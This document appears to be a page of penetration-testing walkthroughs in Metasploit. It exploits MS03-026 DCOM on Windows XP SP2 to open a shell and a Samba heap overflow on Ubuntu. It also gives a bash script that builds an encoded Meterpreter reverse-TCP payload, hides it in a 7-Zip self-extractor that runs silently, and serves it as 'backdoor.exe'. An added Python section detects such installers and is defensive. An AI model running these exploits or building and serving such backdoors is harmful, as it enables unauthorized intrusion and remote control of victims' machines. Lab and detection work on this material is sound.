Penetration testing a target machine running Windows XP SP2

msf  exploit(ms03_026_dcom) > search dcom


Matching Modules
================

   Name                                       Disclosure Date  Rank   Description
   ----                                       ---------------  ----   -----------
   exploit/windows/dcerpc/ms03_026_dcom       2003-07-16       great  Microsoft RPC
   exploit/windows/driver/broadcom_wifi_ssid  2006-11-11       low    Broadcom Wireless
   exploit/windows/smb/ms04_031_netdde        2004-10-12       good   Microsoft NetDDE


msf  exploit(ms03_026_dcom) > use exploit/windows/dcerpc/ms03_026_dcom 

msf  exploit(ms03_026_dcom) >


msf  exploit(ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  135              yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal

msf  exploit(ms03_026_dcom) > set RHOST 192.168.56.102
RHOST => 192.168.56.102
msf  exploit(ms03_026_dcom) >
msf  exploit(ms03_026_dcom) > exploit


[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.56.102[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.56.102[135] ...
[*] Sending exploit ...
[*] Exploit completed, but no session was created.
===========================================================================


msf  exploit(ms03_026_dcom) > set PAYLOAD windows/adduser 
PAYLOAD => windows/adduser


msf > use exploit/windows/dcerpc/ms03_026_dcom 
msf  exploit(ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  135              yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal


msf  exploit(ms03_026_dcom) > set RHOST 192.168.56.102
RHOST => 192.168.56.102
msf  exploit(ms03_026_dcom) > set PAYLOAD windows/shell/bind_tcp 

PAYLOAD => windows/shell/bind_tcp
msf  exploit(ms03_026_dcom) > exploit

[*] Started reverse handler on 192.168.56.101:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 192.168.56.102
[*] Command shell session 1 opened (192.168.56.101:4444 -> 192.168.56.102:1052) at 2011-10-31 01:55:42 +0530

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
================================================================
Penetration testing Windows 8

syringe.sh 

#!/bin/bash
# Network settings: interface to listen on, our own IP, and a random listener port
export interface=eth0
export ourIP=$(ifconfig $interface | awk '/inet addr/ {split ($2,A,":"); print A[2]}')
export port=$(shuf -i 2000-65000 -n 1)

# Build the Meterpreter stager and encode it as alphanumeric shellcode
echo -e "\e[01;32m[>]\e[00m Generating payload..."
payload=$(msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=$port LHOST=$ourIP R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX)

# Wrap the batch launcher and syringe.exe in a 7-Zip self-extracting installer
echo -e "\e[01;32m[>]\e[00m Creating .exe..."
tar -xvf syringe_files.tar
echo "syringe.exe -3 $payload" > s.bat
echo ";!@Install@!UTF-8!" > config.txt
echo "GUIMode=\"2\"" >> config.txt
echo "RunProgram=\"hidcon:s.bat\"" >> config.txt
echo ";!@InstallEnd@!" >> config.txt
7z a files.7z s.bat syringe.exe
# SFX stub + config block + archive = the final executable
cat 7zsd.sfx config.txt files.7z > backdoor.exe
cp backdoor.exe /var/www/
rm config.txt s.bat files.7z 7zsd.sfx syringe.exe

# Serve the result over HTTP
echo -e "\e[01;32m[>]\e[00m Starting Web server..."
service apache2 start
echo -e "\e[01;32m[>]\e[00m Backdoor is hosted on http://$ourIP/backdoor.exe"
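The wrapper above concatenates a 7-Zip SFX stub, a config block bracketed by the `;!@Install@!UTF-8!` and `;!@InstallEnd@!` markers, and the archive; the config tells the stub to run a batch file in a hidden console with the extraction dialog suppressed. From the defender's side that same block is a usable detection signal, because it sits as plain text inside the executable. The following Python is an added example and is not part of the original page or the syringe project: it locates the config block in a file's bytes, parses its `key="value"` lines, and flags the `GUIMode` and `RunProgram` settings the script writes. The sample bytes are constructed stand-ins for an SFX stub and a 7z archive, not real binaries.

```python
"""Flag 7-Zip SFX installers whose embedded config launches a hidden program.

Added example (editor's code, not the page's). The SAMPLE and BENIGN byte
strings are constructed for the demonstration and are not real executables.
"""
import re
from typing import Dict, List, Optional

# Marker strings that delimit the SFX config block (as written by the script above)
SFX_BEGIN = b";!@Install@!UTF-8!"
SFX_END = b";!@InstallEnd@!"


def extract_sfx_config(data: bytes) -> Optional[Dict[str, str]]:
    """Return the key/value pairs of an embedded SFX config block, or None if absent."""
    start = data.find(SFX_BEGIN)
    if start < 0:
        return None
    end = data.find(SFX_END, start)
    if end < 0:
        return None  # opening marker without a closing one: treat as no config
    body = data[start + len(SFX_BEGIN):end].decode("utf-8", errors="replace")
    config: Dict[str, str] = {}
    for line in body.splitlines():
        match = re.match(r'\s*(\w+)\s*=\s*"(.*)"\s*$', line)
        if match:
            config[match.group(1)] = match.group(2)
    return config


def suspicious_sfx_indicators(config: Dict[str, str]) -> List[str]:
    """Heuristics a defender would raise on an SFX config block."""
    findings: List[str] = []
    run = config.get("RunProgram", "")
    if run.lower().startswith("hidcon:"):
        findings.append("RunProgram launches a hidden console")
    if config.get("GUIMode") == "2":
        findings.append("GUIMode=2 suppresses the extraction dialog")
    if re.search(r"\.(bat|cmd|vbs|ps1)\b", run, re.IGNORECASE):
        findings.append("RunProgram executes a script file")
    return findings


def scan_bytes(data: bytes) -> dict:
    """Scan one file image and report whether it carries a suspicious SFX config."""
    config = extract_sfx_config(data)
    if config is None:
        return {"sfx_config": False, "findings": []}
    return {"sfx_config": True, "config": config,
            "findings": suspicious_sfx_indicators(config)}


# Constructed sample: fake stub, then the config the script writes, then a fake archive
SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 32                     # stand-in for the 7zsd.sfx stub
    + b';!@Install@!UTF-8!\r\n'
    + b'GUIMode="2"\r\n'
    + b'RunProgram="hidcon:s.bat"\r\n'
    + b';!@InstallEnd@!\r\n'
    + b"7z\xbc\xaf\x27\x1c"                          # 7z signature, no real archive behind it
)

# Constructed benign image: stub and archive but no config block
BENIGN = b"MZ" + b"\x00" * 40 + b"7z\xbc\xaf\x27\x1c"

if __name__ == "__main__":
    print(scan_bytes(SAMPLE))
    print(scan_bytes(BENIGN))
```

A file-level scan would apply `scan_bytes` to each executable on a web root or a download directory; the check is cheap because the marker search is a plain substring match, and a legitimate SFX installer with a visible dialog and a non-script `RunProgram` produces no findings.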

================================================================

Exploiting a target machine running Linux (Ubuntu)

msf > nmap -sT 192.168.56.101

[*] exec: nmap 192.168.56.101

Starting Nmap 5.20 ( http://nmap.org ) at 2011-11-05 13:35 IST

Warning: Traceroute does not support idle or connect scan, disabling...
Nmap scan report for 192.168.56.101

Host is up (0.00048s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.3 ((Ubuntu) PHP/5.2.1) 
|_html-title: Index of /

139/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME) 

445/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)

MAC Address: 08:00:27:34:A8:87 (Cadmus Computer Systems)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ )

msf > use exploit/linux/samba/lsa_transnames_heap

msf  exploit(lsa_transnames_heap) > show options

Module options (exploit/linux/samba/lsa_transnames_heap):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  LSARPC           yes       The pipe name to use


Exploit target:

   Id  Name
   --  ----
   0   Linux vsyscall


msf  exploit(lsa_transnames_heap) > set RHOST 192.168.56.101
RHOST => 192.168.56.101

msf  exploit(lsa_transnames_heap) >
msf  exploit(lsa_transnames_heap) > set payload linux/x86/shell_bind_tcp 

payload => linux/x86/shell_bind_tcp

msf  exploit(lsa_transnames_heap) > show options

Module options (exploit/linux/samba/lsa_transnames_heap):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.56.101   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  LSARPC           yes       The pipe name to use

msf  exploit(lsa_transnames_heap) > exploit

[*] Started bind handler
[*] Creating nop sled....
[*] Trying to exploit Samba with address 0xffffe410...
[*] Connecting to the SMB service...
==============================================================